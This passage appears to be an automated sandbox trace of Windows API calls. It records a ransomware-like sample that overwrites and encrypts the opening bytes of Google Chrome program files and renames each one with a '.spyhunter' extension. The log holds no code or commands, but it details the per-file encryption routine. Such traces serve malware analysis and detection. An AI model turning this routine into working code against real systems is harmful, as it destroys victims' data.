(x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ml.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ml.pak.spyhunter")) returned 1 [0176.352] GetProcessHeap () returned 0x2c0000 [0176.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.352] GetProcessHeap () returned 0x2c0000 [0176.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0176.352] GetProcessHeap () returned 0x2c0000 [0176.352] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd550 | out: hHeap=0x2c0000) returned 1 [0176.352] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3a8 | out: pbBuffer=0x25ce3a8) returned 1 [0176.352] GetProcessHeap () returned 0x2c0000 [0176.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0176.352] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3a0*=0x30) returned 1 [0176.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\it.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.354] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak") returned 81 [0176.354] StrStrW (lpFirst="it.pak", lpSrch=".txt") returned 0x0 [0176.354] GetProcessHeap () returned 0x2c0000 [0176.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.354] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce364*=0x2800, lpOverlapped=0x0) returned 1 [0176.388] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.388] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce364*=0x2800, lpOverlapped=0x0) returned 1 [0176.388] GetProcessHeap () returned 0x2c0000 [0176.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.388] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.388] WriteFile (in: hFile=0xa0, lpBuffer=0x25ce3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce364, lpOverlapped=0x0 | out: lpBuffer=0x25ce3a4*, lpNumberOfBytesWritten=0x25ce364*=0x4, lpOverlapped=0x0) returned 1 [0176.400] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce364, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce364*=0x30, lpOverlapped=0x0) returned 1 [0176.400] CloseHandle (hObject=0xa0) returned 1 [0176.400] GetProcessHeap () returned 0x2c0000 [0176.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.400] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak.spyhunter") returned 91 [0176.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\it.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\it.pak.spyhunter")) returned 1 [0176.411] GetProcessHeap () returned 0x2c0000 [0176.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.411] GetProcessHeap () returned 0x2c0000 [0176.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0176.412] GetProcessHeap () returned 0x2c0000 [0176.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eccfb0 | out: hHeap=0x2c0000) returned 1 [0176.412] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3a0 | out: pbBuffer=0x25ce3a0) returned 1 [0176.412] GetProcessHeap () returned 0x2c0000 [0176.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0176.412] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce398*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce398*=0x30) returned 1 [0176.412] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\gu.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0176.422] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak") returned 81 [0176.422] StrStrW (lpFirst="gu.pak", lpSrch=".txt") returned 0x0 [0176.422] GetProcessHeap () returned 0x2c0000 [0176.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.422] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce35c*=0x2800, lpOverlapped=0x0) returned 1 [0176.448] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.448] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce35c*=0x2800, lpOverlapped=0x0) returned 1 [0176.449] GetProcessHeap () returned 0x2c0000 [0176.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.449] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.449] WriteFile (in: hFile=0x178, lpBuffer=0x25ce39c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x25ce39c*, lpNumberOfBytesWritten=0x25ce35c*=0x4, lpOverlapped=0x0) returned 1 [0176.574] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce35c*=0x30, lpOverlapped=0x0) returned 1 [0176.574] CloseHandle (hObject=0x178) returned 1 [0176.650] GetProcessHeap () returned 0x2c0000 [0176.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.651] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak.spyhunter") returned 91 [0176.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\gu.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\gu.pak.spyhunter")) returned 1 [0176.652] GetProcessHeap () returned 0x2c0000 [0176.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.652] GetProcessHeap () returned 0x2c0000 [0176.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0176.652] GetProcessHeap () returned 0x2c0000 [0176.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecca10 | out: hHeap=0x2c0000) returned 1 [0176.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3a0 | out: pbBuffer=0x25ce3a0) returned 1 [0176.652] GetProcessHeap () returned 0x2c0000 [0176.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0176.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce398*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce398*=0x30) returned 1 [0176.652] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\de.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0176.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak") returned 81 [0176.662] StrStrW (lpFirst="de.pak", lpSrch=".txt") returned 0x0 [0176.662] GetProcessHeap () returned 0x2c0000 [0176.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.662] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce35c*=0x2800, lpOverlapped=0x0) returned 1 [0176.676] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.676] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce35c*=0x2800, lpOverlapped=0x0) returned 1 [0176.676] GetProcessHeap () returned 0x2c0000 [0176.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.677] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.677] WriteFile (in: hFile=0x178, lpBuffer=0x25ce39c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x25ce39c*, lpNumberOfBytesWritten=0x25ce35c*=0x4, lpOverlapped=0x0) returned 1 [0176.680] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce35c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce35c*=0x30, lpOverlapped=0x0) returned 1 [0176.680] CloseHandle (hObject=0x178) returned 1 [0176.736] GetProcessHeap () returned 0x2c0000 [0176.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.736] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak.spyhunter") returned 91 [0176.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\de.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\de.pak.spyhunter")) returned 1 [0176.737] GetProcessHeap () returned 0x2c0000 [0176.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.737] GetProcessHeap () returned 0x2c0000 [0176.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0176.737] GetProcessHeap () returned 0x2c0000 [0176.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc290 | out: hHeap=0x2c0000) returned 1 [0176.737] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce398 | out: pbBuffer=0x25ce398) returned 1 [0176.738] GetProcessHeap () returned 0x2c0000 [0176.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0176.738] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce390*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce390*=0x30) returned 1 [0176.738] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\am.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0176.738] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak") returned 81 [0176.739] StrStrW (lpFirst="am.pak", lpSrch=".txt") returned 0x0 [0176.739] GetProcessHeap () returned 0x2c0000 [0176.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.739] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce354*=0x2800, lpOverlapped=0x0) returned 1 [0176.740] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.740] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce354*=0x2800, lpOverlapped=0x0) returned 1 [0176.740] GetProcessHeap () returned 0x2c0000 [0176.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.740] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.740] WriteFile (in: hFile=0x178, lpBuffer=0x25ce394*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x25ce394*, lpNumberOfBytesWritten=0x25ce354*=0x4, lpOverlapped=0x0) returned 1 [0176.832] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce354*=0x30, lpOverlapped=0x0) returned 1 [0176.832] CloseHandle (hObject=0x178) returned 1 [0176.832] GetProcessHeap () returned 0x2c0000 [0176.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.832] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak.spyhunter") returned 91 [0176.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\am.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\am.pak.spyhunter")) returned 1 [0176.834] GetProcessHeap () returned 0x2c0000 [0176.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.834] GetProcessHeap () returned 0x2c0000 [0176.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0176.834] GetProcessHeap () returned 0x2c0000 [0176.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0f0 | out: hHeap=0x2c0000) returned 1 [0176.834] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce398 | out: pbBuffer=0x25ce398) returned 1 [0176.834] GetProcessHeap () returned 0x2c0000 [0176.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0176.834] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce390*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce390*=0x30) returned 1 [0176.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\icudtl.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0176.835] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat") returned 77 [0176.835] StrStrW (lpFirst="icudtl.dat", lpSrch=".txt") returned 0x0 [0176.835] GetProcessHeap () returned 0x2c0000 [0176.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.836] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25ce354*=0x2800, lpOverlapped=0x0) returned 1 [0176.859] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.859] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25ce354*=0x2800, lpOverlapped=0x0) returned 1 [0176.860] GetProcessHeap () returned 0x2c0000 [0176.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.860] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.860] WriteFile (in: hFile=0x178, lpBuffer=0x25ce394*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x25ce394*, lpNumberOfBytesWritten=0x25ce354*=0x4, lpOverlapped=0x0) returned 1 [0176.997] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce354, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce354*=0x30, lpOverlapped=0x0) returned 1 [0176.997] CloseHandle (hObject=0x178) returned 1 [0177.007] GetProcessHeap () returned 0x2c0000 [0177.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.007] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat.spyhunter") returned 87 [0177.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\icudtl.dat"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\icudtl.dat.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\icudtl.dat.spyhunter")) returned 1 [0177.009] GetProcessHeap () returned 0x2c0000 [0177.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.009] GetProcessHeap () returned 0x2c0000 [0177.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0177.009] GetProcessHeap () returned 0x2c0000 [0177.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea388 | out: hHeap=0x2c0000) returned 1 [0177.009] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce390 | out: pbBuffer=0x25ce390) returned 1 [0177.009] GetProcessHeap () returned 0x2c0000 [0177.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0177.009] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce388*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce388*=0x30) returned 1 [0177.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\drive.crx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0177.011] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx") returned 89 [0177.011] StrStrW (lpFirst="drive.crx", lpSrch=".txt") returned 0x0 [0177.011] GetProcessHeap () returned 0x2c0000 [0177.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.011] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce34c*=0x2800, lpOverlapped=0x0) returned 1 [0177.035] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.035] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce34c*=0x2800, lpOverlapped=0x0) returned 1 [0177.036] GetProcessHeap () returned 0x2c0000 [0177.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.036] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.036] WriteFile (in: hFile=0x178, lpBuffer=0x25ce38c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x25ce38c*, lpNumberOfBytesWritten=0x25ce34c*=0x4, lpOverlapped=0x0) returned 1 [0177.085] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce34c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce34c*=0x30, lpOverlapped=0x0) returned 1 [0177.085] CloseHandle (hObject=0x178) returned 1 [0177.085] GetProcessHeap () returned 0x2c0000 [0177.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.085] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx.spyhunter") returned 99 [0177.086] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\drive.crx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\drive.crx.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\drive.crx.spyhunter")) returned 1 [0177.087] GetProcessHeap () returned 0x2c0000 [0177.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.087] GetProcessHeap () returned 0x2c0000 [0177.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0177.087] GetProcessHeap () returned 0x2c0000 [0177.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e3c0 | out: hHeap=0x2c0000) returned 1 [0177.087] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce390 | out: pbBuffer=0x25ce390) returned 1 [0177.088] GetProcessHeap () returned 0x2c0000 [0177.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0177.088] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce388*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce388*=0x30) returned 1 [0177.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files 